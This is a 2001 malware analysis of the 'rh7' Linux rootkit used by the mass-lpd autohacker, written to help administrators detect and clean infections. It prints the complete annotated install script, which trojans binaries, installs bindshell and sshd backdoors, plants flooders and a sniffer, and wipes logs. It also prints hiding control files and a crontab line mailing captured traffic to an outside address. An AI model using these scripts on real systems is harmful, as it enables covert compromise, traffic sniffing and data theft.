Date of Analyze : 17 / 06 / 01 Author : Fredrik Ostergren [ press@alldas.de ] Description: Linux rootkit from the mass-lpd autohacker ( rh7.tar.gz ) -----[ Disclaimer Information revealed in this and other analysis are in no way made to contribute illegal actions such as hacking or other forms of computer crimes. They should serve as informative sources to prevent actions like mentioned before. -----[ Introduction You might have seen my analysis about the mass-lpd autohacker which was used to mass-hack RedHat 7.0 machines running the printer service 'lpd'. If that was the case you might have noticed that it downloaded a rootkit called rh7.tar.gz from a distro ftp and installed it. However, when I Analyzed that autohacker I didn't have a copy of the rh7.tar.gz file but now I have. I hope you will enjoy this review, it's pretty big and I'm very tired when I'm writing this so excuse any grammar errors or similar typo's. Keep comments rolling in, I want feedback! Now enjoy...! -----[ Main fredrik@slaptop:~/rh7$ ls -al total 580 drwxr--r-- 4 fredrik users 4096 Mar 28 21:27 ./ drwx--x--x 23 fredrik users 4096 Jun 14 22:43 ../ -rw-r--r-- 1 fredrik users 494 Feb 27 15:17 .1addr -rw-r--r-- 1 fredrik users 253 Feb 27 15:17 .1file -rw-r--r-- 1 fredrik users 158 Mar 2 18:54 .1logz -rw-r--r-- 1 fredrik users 203 Mar 11 20:15 .1proc -rwxr-xr-x 1 fredrik users 1198 Mar 18 17:31 atd.init* -rwsr-sr-x 1 fredrik users 10748 Mar 5 16:32 chsh* -rw-r--r-- 1 fredrik users 110 Feb 24 17:47 crontab-entry -rwxr-xr-x 1 fredrik users 24500 Mar 5 16:29 du* -rwxr-xr-x 1 fredrik users 61808 Mar 5 16:32 find* -rw-r--r-- 1 fredrik users 816 Mar 18 17:29 functions -rwxr-xr-x 1 fredrik users 22960 Mar 5 16:32 ifconfig* -rwxr-xr-x 1 fredrik users 6261 Mar 25 20:04 install* -rwxr-xr-x 1 fredrik users 11260 Mar 5 16:32 killall* -rwxr-xr-x 1 fredrik users 6680 Mar 5 16:33 linsniffer* -rwxr-xr-x 1 fredrik users 44480 Mar 5 16:33 login* -rwxr-xr-x 1 fredrik users 34032 Mar 11 18:48 lpd* -rwxr-xr-x 1 fredrik users 39296 Mar 5 16:33 ls* -rwxr-xr-x 1 fredrik users 804 Mar 27 13:55 mail* -rwxr-xr-x 1 fredrik users 6248 Mar 15 20:28 md5bd* drwxr-xr-x 2 fredrik users 4096 Mar 15 21:00 mech/ -rwxr-xr-x 1 fredrik users 31240 Mar 5 16:33 netstat* -rwxr-xr-x 1 fredrik users 33452 Mar 5 16:33 ps* -rwxr-xr-x 1 fredrik users 11768 Mar 5 16:33 pstree* -rwxr-xr-x 1 fredrik users 4060 Sep 21 2000 sense* -rwxr-xr-x 1 fredrik users 3688 Mar 5 16:33 shad* -rwxr-xr-x 1 fredrik users 10068 Mar 5 16:34 slice* drwxr-xr-x 2 fredrik users 4096 Mar 5 16:30 sshd/ -rwxr-xr-x 1 fredrik users 26076 Mar 5 16:34 syslogd* -rwxr-xr-x 1 fredrik users 1199 Mar 16 18:22 syslogd.init* -rwxr-xr-x 1 fredrik users 49520 Mar 10 16:34 top* -rwxr-xr-x 1 fredrik users 4780 Mar 5 16:44 vadim* -rwxr-xr-x 1 fredrik users 39296 Mar 5 16:29 vdir* -rwxr-xr-x 1 fredrik users 6100 Mar 5 16:34 wp* -rwxr-xr-x 1 fredrik users 1736 Mar 16 18:27 xinetd* md5sum output - 76aceb57cefa0ef28c54dce6546e3e26 atd.init 4169982f78683a02089173c69b051eb3 chsh 1d62b0c5667c5cce91b1f747dfb6a07b crontab-entry 08a84633eb02ca76daf9c3bc7c29788f du 175bf23af7dd3a5d85b062c5f30a7079 find 530dd135f52876a7a489c48b3c97230a functions 08dc011604d50206f382eda71a0b922a ifconfig 0fb266a5d910323bc2911eb06b8b5e17 install bcfc0dd2812f359cfcd33f2c347b50f8 killall ffb9305e8b3780b5a3f15add92d7cdda linsniffer 930acd6c9bca3a2c571f4964c0300b07 login abab20051b2e034ba65387e2458776dd lpd eb9cbebe77ceeb4b50b7fea17af80fa7 ls 5576278696d99a440a9b02e9edbd3ea7 mail d4ddfaaf5f7413378f4ceac0173038a3 md5bd 58bc6eaa9bd251f9f8536abb1136eca7 netstat 7082b1caed760251069b2bb721b4dd0c ps 80c61366830e5459b6368b6e6b5053c0 pstree 464dc23cac477c43418eb8d3ef087065 sense cf50d847032e920cef236191ec0ccb1e shad b8f97d0ba7d21e5b08d98f32ccb97fec slice 7a271ef38e3558b06eed7df26d0db1a0 syslogd 1f7454c1883f5edfdce109a6f111698e syslogd.init 2b6918ecc01c4c93ab96785c3a865d4e top b9eb48dc982fa8de631931bcdcc36b94 vadim 03e267ff8264f6e4a6ab0955cea63fda vdir c4774db51553f61c8aefb1bcc123a81c wp a980cf178e120e0d0685df364637b482 xinetd -----[ Main [ File: install ] The following is the complete installation script that setup the rootkit on the infected computer. #!/bin/sh unset HISTFILE [ unsetting HISTFILE so no commands will be logged to .bash_history ] cl="m" [ colors ] cyn="m" wht="m" hblk="30m" hgrn="32m" hcyn="36m" hwht="37m" hred="31m" echo "*** Rootkit install log ***" >install.log [ making a install.log ] cp -f syslogd.init /etc/rc.d/init.d/syslog >>install.log 2>&1 [ putting a trojaned .sh script into /etc/rc.d/init.d/syslog ] /etc/rc.d/init.d/syslog stop >>install.log 2>&1 [ stops syslog so it can be trojanised ] chattr -i /usr/bin/chsh /etc/rc.d/init.d/atd /usr/local/sbin/sshd /usr/sbin/sshd /bin/ps /bin/.ps /bin/netstat /bin/login /bin/ls /usr/bin/du /usr/bin/find /usr/sbin/atd /usr/bin/pstree /usr/bin/killall /usr/bin/top /sbin/fuser /sbin/ifconfig /sbin/syslogd /etc/rc.d/init.d/xinetd >>install.log 2>&1 [ <- removing 'i' flag so the rootkit can modify these binaries + kill'ing binaries to they can be replaced ] echo echo " ${cl}${cyn}-=${cl}${hblk}[${cl}${hgrn}overkill Red Hat 7.0 rootkit${cl}${hblk}]${cl}${cyn}=-${cl}${wht}" echo echo "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Installing trojaned programs...${cl}${wht}" echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}chsh" chmod +s chsh cp -f chsh /usr/bin/chsh >>install.log 2>&1 [ trojaning chsh ] cp -f .1proc /dev/ttyop [ copying control files for various trojans to their locations ] cp -f .1addr /dev/ttyoa cp -f .1file /dev/ttyof cp -f .1logz /dev/ttyos /etc/rc.d/init.d/atd stop >>install.log 2>&1 [ stopping the 'atd' service ] killall -9 atd >>install.log 2>&1 [ kill'ing it if the stop script failed ] rm -f /var/lock/subsys/atd [ removing the lock file for it ] echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}ps" echo "ps " >>install.log if [ ! -x /bin/lps ]; then mv -f /bin/ps /bin/lps >>install.log 2>&1 [ copying old ps file to /bin/lps ] if [ -x /bin/.ps ]; then mv -f /bin/.ps /bin/lps >>install.log 2>&1 fi fi cp -f ps /bin/ps >>install.log 2>&1 if [ -x /bin/.ps ]; then cp -f ps /bin/.ps >>install.log 2>&1 fi [ this is made for the binaries top/pstree/killall/find/ls/vdir/du/netstat/ifconfig/syslogd, i removed it to save space... ] if [ ! -d /usr/include/rpcsvc ]; then mkdir -p /usr/include/rpcsvc >>install.log 2>&1 [ making secret rootkit dir ] fi echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}ifconfig" echo "ifconfig " >>install.log if [ ! -x /usr/include/rpcsvc/ifc ]; then mv -f /sbin/ifconfig /usr/include/rpcsvc/ifc >>install.log 2>&1 fi cp -f ifconfig /sbin/ifconfig echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}wp" cp -f wp /usr/bin/wp [ copying the log cleaner application wipe to /usr/bin/wp ] echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}shad" echo "shad " >>install.log cp -f shad /bin [ copying the file 'shad' to /bin & /usr/bin ] cp -f shad /usr/bin echo "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Installing backdoors...${cl}${wht}" echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}login" echo "login " >> install.log mv -f /bin/login /usr/bin/xlogin >>install.log 2>&1 [ installing the /bin/login backdoor ] cp -f login /bin/login >>install.log 2>&1 echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}md5bd" echo "md5bd " >> install.log >>install.log 2>&1 cp -f md5bd /usr/sbin/atd >>install.log 2>&1 [ installing the bindshell with md5 password in /usr/sbin/atd ] cp -f lpd /sbin/lpd [ also installing the bindshell to /sbin/lpd ] cp -f atd.init /etc/rc.d/init.d/atd >>install.log 2>&1 if [ -x /sbin/chkconfig ]; then /sbin/chkconfig --add atd >>install.log 2>&1 [ adding the atd (bindshell) daemon into chkconfig ] else ln -s /etc/rc.d/init.d/atd /etc/rc.d/rc0.d/K60atd [ making links to other rc.d files to be sure that it starts at bootup ] ln -s /etc/rc.d/init.d/atd /etc/rc.d/rc1.d/K60atd ln -s /etc/rc.d/init.d/atd /etc/rc.d/rc2.d/K60atd ln -s /etc/rc.d/init.d/atd /etc/rc.d/rc3.d/S40atd ln -s /etc/rc.d/init.d/atd /etc/rc.d/rc4.d/S40atd ln -s /etc/rc.d/init.d/atd /etc/rc.d/rc5.d/S40atd ln -s /etc/rc.d/init.d/atd /etc/rc.d/rc6.d/K60atd fi /etc/rc.d/init.d/atd start >>install.log 2>&1 [ starting the bindshell ] echo "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Installing DoS programs...${cl}${wht}" echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}vadim" cp -f vadim /usr/bin [ installing UDP flooder vadim ] echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}slice" cp -f slice /usr/bin [ installing the synflooder slice ] echo "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Installing sniffer...${cl}${wht}" echo "sniffer " >> install.log if [ ! -d /usr/local/games ]; then mkdir -p /usr/local/games [ making sniffer directory ] fi cp -f linsniffer /usr/local/games/identd [ installing the sniffer as 'identd' ] cp -f sense /usr/local/games/banner [ installing the logparser for linsniffer as 'banner' ] #echo "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Installing mech...${cl}${wht}" #cd mech #./mech-install >>../install.log 2>&1 #cd .. cat functions >>/etc/rc.d/init.d/functions [ installing the 'functions' file (reviewed later) ] cp -f xinetd /etc/rc.d/init.d/xinetd [ installing the trojaned xinetd script ] /etc/rc.d/init.d/xinetd restart echo "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Setting up crontab entries...${cl}${wht}" crontab -u operator crontab-entry >> install.log 2>&1 [ adding the file crontab-entry to crontab (for user operator) ] echo "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Installing sshd backdoor...${cl}${wht}" cd sshd ./sshd-install >>../install.log 2>>../install.log [ installing the sshd-backdoor ] cd .. /etc/rc.d/init.d/lpd stop >>install.log 2>&1 [ stopping lpd and removing from chkconfig scripts ] /sbin/chkconfig --del lpd >>install.log 2>&1 /etc/rc.d/init.d/syslog start >>install.log 2>&1 [ restarting with trojaned syslogd ] echo "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Cleaning logs...${cl}${wht}" echo >/var/log/messages [ zeroing out all logs ] echo >/var/log/boot.log echo >/var/log/cron echo >/var/log/secure echo >/var/log/maillog echo echo "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Rootkit installed. Enjoy! :)${cl}${wht}" [ rootkit is done ] [ eof 'install' ] [ File: sshd-install ] #!/bin/sh mkdir -p /etc/ssh2 >>../install.log 2>&1 [ making the directory /etc/ssh2 ] cp -f init.sshd /etc/rc.d/init.d/sshd >>../install.log 2>&1 if [ -x /sbin/chkconfig ]; then /sbin/chkconfig --add sshd >>../install.log 2>&1 [ adding sshd to chkconfig ] else ln -s /etc/rc.d/init.d/sshd /etc/rc.d/rc0.d/K25sshd [ fixing so sshd will start at bootup ] ln -s /etc/rc.d/init.d/sshd /etc/rc.d/rc1.d/K25sshd ln -s /etc/rc.d/init.d/sshd /etc/rc.d/rc2.d/S55sshd ln -s /etc/rc.d/init.d/sshd /etc/rc.d/rc3.d/S55sshd ln -s /etc/rc.d/init.d/sshd /etc/rc.d/rc4.d/S55sshd ln -s /etc/rc.d/init.d/sshd /etc/rc.d/rc5.d/S55sshd ln -s /etc/rc.d/init.d/sshd /etc/rc.d/rc6.d/K25sshd cp -f hostkey /etc/ssh2 [ installing necessary files for the sshd backdoor ] cp -f hostkey.pub /etc/ssh2 [ hostkey / hostkey.pub files ] cp -f sshd2_config /etc/ssh2 [ installing a normal config file (listening on port 22 etc) ] cp -f sshd /usr/local/sbin [ installing binaries into /usr/local/sbin & /usr/sbin/ ] cp -f sshd /usr/sbin /etc/rc.d/init.d/sshd start >>../install.log 2>&1 [ starting sshd ] [ eof 'sshd-install' ] [ File : functions ] inet_start(){ cd /usr/local/games [ changing directory to the sniffer directory ] PBACK=$PATH PATH=/usr/local/games identd -e -o & [ starting the sniffer ] PATH=$PBACK if [ -x /bin/shad ] || [ -x /usr/bin/shad ]; then shad [nfsd] /usr/local/sbin/sshd -q -p 137 >/dev/null 2>&1 [ if 'shad' exist he starts the sshd backdoor on port 137 (netbios port) ] else /usr/local/sbin/sshd -q -p 137 >/dev/null 2>&1 fi cd /usr/sbin PBACK=$PATH PATH=/usr/sbin sshd >/dev/null 2>&1 [ starting sshd on the normal port (running from standard config file) ] PATH=$PBACK cd / cd /usr/local/sbin PBACK=$PATH PATH=/usr/local/sbin sshd -q -p 137 >/dev/null 2>&1 [ skipping use of shad and instead starts the sshd backdoor like "normal" ] PATH=$PBACK cd / cd /usr/bin if [ -x /usr/bin/tcpd ]; then [ starting tcpd ?? ] PBACK=$PATH PATH=/usr/bin tcpd >/dev/null 2>&1 PATH=$PBACK cd / fi if [ ! "`pidof "/sbin/lpd" 2>/dev/null`" ]; then cd /sbin PBACK=$PATH PATH=/sbin lpd >/dev/null 2>&1 [ starting the bindshell ] PATH=$PBACK cd / fi } [ eof 'functions' ] [ File: mail ] #!/bin/sh MYIPADDR=`/sbin/ifconfig eth0 | grep "inet addr:" | \ [ getting the internet address (IPv4 Address) ] awk -F ' ' ' {print $2} ' | cut -c6-` echo "Hostname : `hostname -f` ($MYIPADDR)" [ getting the hostname ] echo "Alternative IP : `hostname -i`" if [ -f /etc/*-release ]; then [ getting Linux release ] echo "Distro: `head -1 /etc/*-release`" uname -a echo ----------------------------------------------------------------- echo "yahoo.com ping:" [ internet connection stats. ] ping -c 6 yahoo.com echo ----------------------------------------------------------------- echo "hw info:" echo "CPU: `cat /proc/cpuinfo|grep MHz|awk -F ' ' ' {print $4} '` MHz" [ computer information ] RAM=`free|grep Mem|awk -F ' ' ' {print $2} '` if [ -x /usr/bin/dc ]; then echo "$RAM 1024 / 3 + p" >tmp echo "RAM: `/usr/bin/dc tmp` Mb" rm -f tmp else echo "RAM: $RAM Kb" echo ----------------------------------------------------------------- [ This mail will be sent to the user when the kit is acting as an autohacker / worm ] [ eof 'mail' ] [ The following are various rootkit files used by some trojans ] [ File: .1addr - /dev/ttyoa ] [ Control file for netstat trojan ] [ 1 = Hide incoming from that address ] [ 2 = Hide outgoing to that address ] [ 3 = Hide incoming to that port ] [ 4 = Hide outgoing to that port ] [ 5 = Hide that UNIX socket (dir) ] 1 194.102 [ hide incoming connections from 194.102.*.* ] 1 24 [ hide incoming connections from 24.*.*.* ] 3 37 [ hide incoming connections to port 37 ] 3 134 3 112 3 114 3 135 3 136 3 137 3 23 3 21 3 22 3 2049 3 2424 3 465 4 6667 4 6669 4 6668 4 7000 4 6660 4 111 4 53 4 135 4 22 4 515 4 23 2 129.130.12.31 2 129.130.12.31 2 204.127.145.17 2 216.24.134.10 2 208.51.158.100 2 199.170.91.114 2 208.51.158.10 2 207.114.4.34 2 205.252.46.98 2 132.207.4.32 2 207.114.4.34 2 205.252.46.98 2 207.110.0.52 2 216.225.7.155 2 202.14.100.12 2 195.112.4.25 2 207.96.122.250 2 207.114.4.35 2 154.11.89.164 2 212.43.217.183 2 207.69.200.13 [ eof '.1addr' ] [ File: .1file - /dev/ttyof ] [ Control file for ls/vdir/dir/find/du ] [ Hide all files containing this ] psybnc yppoll fortune banner tcp.log lkillall ltop lpstree r00ter r00ter.tgz r00ter2.c r00ter2 psybnc.conf scan overstatdx overlpr overbind scan sshd sshd2 ttyop ttyof ttyoa ttyos shad tcpd mech.set mech.pid mech.session ftpusers- [ eof '.1file' ] [ FIle: .1logz - /dev/ttyos ] [ Control file for the syslogd trojan ] [ All strings containing this will not be logged to syslogd ] home.com hobbiton.org nether.net oltenia.ro 194.102 24.3 sshd syslog klogd net-pf-10 modprobe ftpd operator games promiscuous PF_INET xinetd [nfsd] [mingetty] [ eof '.1file' ] [ File: .1proc - /dev/ttyop ] [ control file for ps/top ] [ 3 = Hide all things containing 'string' ] 3 slice [ Ex. everything containing *slice* will be hidden from ps/top ] 3 vadim 3 overdrop 3 yppoll 3 eggdrop 3 mech 3 banner 3 r00ter 3 r00ter2 3 overlpd 3 overbind 3 overstatdx 3 scan 3 ping 3 sshd 3 bnc 3 linsniffer 3 ssh 3 nc 3 tcpd 3 rpc.lockd 3 rpc.mountd 3 lpd [ eof '.1proc' ] [ File: crontab-entry ] [ This file will be added to the user 'operator's crontab file looks like this ] 0 0 1 * * /usr/local/games/banner /usr/local/games/tcp.log|mail -s 'tcp.log' uglykid@mail.com >/dev/null 2>&1 [ Basicly it will mail the tcp.log to uglykid@mail.com the 1th of every month ] [ eof 'crontab-entry' ] -----[ Am I infected ? How do I clean up ? Q: Am I infected ? If you think that you are infected then upload a clean ls and list various directories that the install script create or just do fredrik@slaptop:~/analys/rh7$ strings /bin/ps| grep ttyo /dev/ttyop Also, If you notice that your connection is a bit slow or if many packets is going to the Internet from your host you might be infected as this kit includes dos tools such as slice and vadim. Q: How do I clean up ? A: Backup any necessary files but be sure that they are not infected before you put them on a fresh installation. Total reinstallation is often needed in these cases. Follow the normal steps after a break-in. -----[ File summary .1addr = control file for netstat .1logz = Control file for syslogd .1proc = Control file for ps/top atd.init = Trojaned version of an init file to start bindshell at bootup chsh = Trojaned version of chsh crontab-entry = File to mail the snifferlog to uglykid@mail.com du = Trojaned version of du to hide files find = Trojaned version of find to hide files functions = Script to start various trojans such as sshd-backdoor and bindshell ifconfig = Ifconfig trojan to hide promiscious mode when using an ethernet sniffer install = Install script to install the rootkit. killall = Trojaned version of killall so root can not kill processes listed in /dev/ttyop linsniffer = Ethernet sniffer to sniff data on a LAN login = Trojaned version of /bin/login (to remote root logins with a magic password) ls = Trojaned version of ls to hide files listed in /dev/ttyof mail = Script to gather information about the computer to be e-mailed to the "hacker" md5bd = Bindshell with md5 password (pwd=855f314a4a3eebb6e1f9c3dae3a8ae31). Will be copied to /usr/sbin/atd mech/ = Directory containing the IRC-bot 'mech' netstat = Trojaned version of netstat to hide connections specified in the file /dev/ttyoa ps/pstree/top = Trojaned version which will hide processes specified in /dev/ttyop sense = Logparser for linsniffer slice = DoS-Tool (SYN-flooder) sshd/ = Directory which contains the sshd backdoor and needed files syslogd = Trojaned version of syslogd to hide logs containing string from /dev/ttyos syslogd.init = Trojaned init script to start syslogd. vadim = Dos-tool (UDP flooder) du = Trojaned version of vdir to hide files wp = The log cleaner WIPE to clean wtmp/utmp/lastlog xinetd = Trojaned init script to start xinetd -----[ Conclusion This rootkit replaces many binaries and that way it can easily be detected. It doesn't change date/time/size so a clean version of ls will show changes on the trojaned files. It puts backdoors and dos tools right into /bin & /usr/sbin directories and therefor it relies much on the /bin/ls trojan. Lot's of improvements could've been done to this kit but I doubt the author put much energy into it. Fredrik Östergren press@alldas.de